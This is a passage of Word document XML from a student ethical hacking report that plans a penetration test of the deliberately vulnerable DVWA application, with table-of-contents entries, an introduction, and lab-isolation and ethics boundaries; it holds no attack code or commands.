          <w:hyperlink w:anchor="_Toc231851446" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix G: Burp Suite Exploitation in Action</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851446 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68EF6529" w14:textId="6CC89B4C" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851447" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix H: Metasploit in Action</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851447 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E83088C" w14:textId="5585A357" w:rsidR="00F11EBA" w:rsidRPr="005F415B" w:rsidRDefault="00F11EBA" w:rsidP="005F415B">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00097425">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="565C8911" w14:textId="77777777" w:rsidR="00F11EBA" w:rsidRDefault="00F11EBA" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13533F10" w14:textId="77777777" w:rsidR="00F11EBA" w:rsidRDefault="00F11EBA" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51688633" w14:textId="77777777" w:rsidR="00F11EBA" w:rsidRDefault="00F11EBA" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA19F6D" w14:textId="77777777" w:rsidR="00F11EBA" w:rsidRDefault="00F11EBA" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24293055" w14:textId="77777777" w:rsidR="00F11EBA" w:rsidRDefault="00F11EBA" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AFF2D9" w14:textId="77777777" w:rsidR="00F11EBA" w:rsidRDefault="00F11EBA" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147ECA81" w14:textId="77777777" w:rsidR="00F11EBA" w:rsidRDefault="00F11EBA" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F3F6BE" w14:textId="77777777" w:rsidR="00F11EBA" w:rsidRDefault="00F11EBA" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6AC6C0" w14:textId="77777777" w:rsidR="00097425" w:rsidRDefault="00097425" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44C28013" w14:textId="0346F971" w:rsidR="00F11EBA" w:rsidRDefault="00000000" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="54DC0FBC">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B23E546" w14:textId="173ED2F1" w:rsidR="007C5D7E" w:rsidRPr="003E016F" w:rsidRDefault="000B7890" w:rsidP="003E016F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc228099269"/>
      <w:bookmarkStart w:id="2" w:name="_Toc231851422"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="77C9FD57" w14:textId="77777777" w:rsidR="003D4B93" w:rsidRDefault="00EC695B" w:rsidP="003D4B93">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00097425">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Problem/Background and Motivation</w:t>
      </w:r>
      <w:r w:rsidR="00AE3DD9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003D4B93" w:rsidRPr="003D4B93">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The main goal of this project is to get practical experience on how to use the ethical hacking concepts in real life scenarios of a web application. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FE87D5" w14:textId="77777777" w:rsidR="003D4B93" w:rsidRDefault="003D4B93" w:rsidP="003D4B93">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1208B24E" w14:textId="4F25B614" w:rsidR="003D4B93" w:rsidRDefault="003D4B93" w:rsidP="003D4B93">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4B93">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">While these Web-based vulnerabilities, such as the SQL injection attack and Cross-Site Scripting (XSS), remain prevalent security threats, our goal is to expand our course concepts, conduct more in-depth research on each, and recommend technical solutions to address each. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7514496E" w14:textId="77777777" w:rsidR="003D4B93" w:rsidRDefault="003D4B93" w:rsidP="003D4B93">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CAB6AE4" w14:textId="72AD153A" w:rsidR="002D1732" w:rsidRDefault="003D4B93" w:rsidP="003D4B93">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4B93">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The goal of this simulation is to gain insight into the execution of a penetration test on the Damn Vulnerable Web Application (DVWA) and to the implementation of protective measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4EE4AF" w14:textId="77777777" w:rsidR="003D4B93" w:rsidRDefault="003D4B93" w:rsidP="003D4B93">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FFAC9E" w14:textId="34E228C2" w:rsidR="002D1732" w:rsidRDefault="002D1732" w:rsidP="002D1732">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc228099270"/>
      <w:bookmarkStart w:id="4" w:name="_Toc231851423"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00F11EBA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="6D4AD240" w14:textId="77777777" w:rsidR="00CB2161" w:rsidRDefault="00EC695B" w:rsidP="00CB2161">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00097425">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ethical and Legal Boundaries</w:t>
      </w:r>
      <w:r w:rsidR="00CC1D74" w:rsidRPr="00097425">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00CB2161" w:rsidRPr="00CB2161">
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00CB2161">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB2161" w:rsidRPr="00CB2161">
        <w:t>boundaries</w:t>
      </w:r>
      <w:r w:rsidR="00CB2161">
        <w:t xml:space="preserve"> provided below</w:t>
      </w:r>
      <w:r w:rsidR="00CB2161" w:rsidRPr="00CB2161">
        <w:t xml:space="preserve"> are set to make sure that the course is followed fully according to its safety and ethics requirements: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063B5FB0" w14:textId="77777777" w:rsidR="00CB2161" w:rsidRDefault="00CB2161" w:rsidP="00CB2161">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61D83B8C" w14:textId="77777777" w:rsidR="00CB2161" w:rsidRDefault="00CB2161">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006C423C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target Environment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2161">
        <w:t xml:space="preserve"> All attacks are limited to vulnerable VMs created by students in a local isolated lab. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09555CEA" w14:textId="77777777" w:rsidR="006C423C" w:rsidRDefault="006C423C" w:rsidP="006C423C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00BAC9EB" w14:textId="77777777" w:rsidR="00CB2161" w:rsidRDefault="00CB2161">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006C423C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2161">
        <w:t xml:space="preserve">: The project uses a VirtualBox NAT Network to keep all traffic within the virtual box and not out to the internet. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C254F16" w14:textId="77777777" w:rsidR="006C423C" w:rsidRDefault="006C423C" w:rsidP="006C423C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E5436E" w14:textId="65D55FFF" w:rsidR="00CB2161" w:rsidRDefault="00CB2161">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006C423C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidR="006C423C" w:rsidRPr="006C423C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Scans</w:t>
      </w:r>
      <w:r w:rsidRPr="006C423C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2161">
        <w:t xml:space="preserve"> We guarantee there will be no scanning or attacking of any public or production systems. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2753A22A" w14:textId="77777777" w:rsidR="006C423C" w:rsidRDefault="006C423C" w:rsidP="006C423C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F345C7F" w14:textId="18E0F35F" w:rsidR="002D1732" w:rsidRPr="006C423C" w:rsidRDefault="00CB2161">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C423C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Legal Compliance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2161">
        <w:t xml:space="preserve"> The testing is done for educational purposes only as part of </w:t>
      </w:r>
      <w:r w:rsidRPr="006C423C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the CSCI369 Ethical Hacking Course</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2161">
        <w:t xml:space="preserve"> at the </w:t>
      </w:r>
      <w:r w:rsidRPr="006C423C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>University of Wollongong, Dubai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E20F6E3" w14:textId="77777777" w:rsidR="002D1732" w:rsidRDefault="002D1732" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="189AC21D" w14:textId="77777777" w:rsidR="002D1732" w:rsidRDefault="002D1732" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="495E2BC7" w14:textId="77777777" w:rsidR="002D1732" w:rsidRDefault="002D1732" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05DD1C9D" w14:textId="77777777" w:rsidR="002D1732" w:rsidRDefault="002D1732" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124F56BC" w14:textId="77777777" w:rsidR="002D1732" w:rsidRDefault="002D1732" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
